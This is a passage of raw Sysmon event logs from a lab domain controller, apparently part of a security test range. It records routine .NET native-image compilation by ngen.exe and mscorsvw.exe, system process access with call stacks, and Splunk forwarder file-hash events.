21:05:17.203{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A20D-60D3-5B04-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021438Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:17.093{4DB9351A-A20B-60D3-5A04-00000000CF01}2080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\820-0\System.Activities.Core.Presentation.dll2021-06-23 21:05:17.093 23542300x800000000000000021437Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:17.062{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B4B082A33107EDE66202AE9DFBB097,SHA256=C26F3FA964E6407E1323AD09C16C6A8FA942DDCA5540AD7F4E7EC2881D15D77A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:18.234{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FCA0D4B5F83FF9FA0674424BFE4E094E,SHA256=198BEDDA2AAE52C9CD98633F6E9DDAFBDDA200A0876D5C6CC716ACB2998CEFD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:18.078{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=680D81798FA77E861C45DF99CDA7E34F,SHA256=C358C800BF4F99C5EC4DE80C3383DA39F0BC628786CE9984B1AB5382E9C49557,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:19.109{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB4C3DBFF169D48DF93BDD4E58E52A08,SHA256=4711EC3FE2E34E29FED2D20F7AFE77477E209FE7C7E33C0A4D0B74414E387CAF,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000021459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:20.968{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A210-60D3-5F04-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:20.906{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A210-60D3-5F04-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:20.906{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A210-60D3-5F04-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:20.671{4DB9351A-A20D-60D3-5E04-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d04-0\System.Activities.Presentation.dll2021-06-23 21:05:20.671 23542300x800000000000000021455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:20.124{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C607E3EF1AB64DFA4555EF3BE91B7487,SHA256=C8C4E98F93F7A014D88D993C2A9379E5F2107C1A5B60BF7CE19F83CEEE0541B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.906{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=63DE781B8338316706E8E2299CDFA238,SHA256=CE14D976BA03F017DAB243D84C0CE4609571BD977A2B7FBE1E3415DF826D7CA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.859{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A211-60D3-6404-00000000CF01}4228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:21.843{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A211-60D3-6404-00000000CF01}4228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.843{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A211-60D3-6404-00000000CF01}4228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:21.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A211-60D3-6304-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.781{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A211-60D3-6304-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:21.781{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A211-60D3-6304-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:21.718{4DB9351A-A211-60D3-6204-00000000CF01}2672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a70-0\System.AddIn.Contract.dll2021-06-23 21:05:21.718 10341000x800000000000000021471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:21.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A211-60D3-6204-00000000CF01}2672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.656{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A211-60D3-6204-00000000CF01}2672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:21.656{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A211-60D3-6204-00000000CF01}2672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:21.609{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A211-60D3-6104-00000000CF01}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.578{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A211-60D3-6104-00000000CF01}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:21.578{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A211-60D3-6104-00000000CF01}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:21.468{4DB9351A-A211-60D3-6004-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18c4-0\System.AddIn.dll2021-06-23 21:05:21.468 354300x800000000000000021464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:20.101{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program 
21:05:32.201{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21C-60D3-6D04-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:32.170{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A21C-60D3-6D04-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021523Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:32.170{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21C-60D3-6D04-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll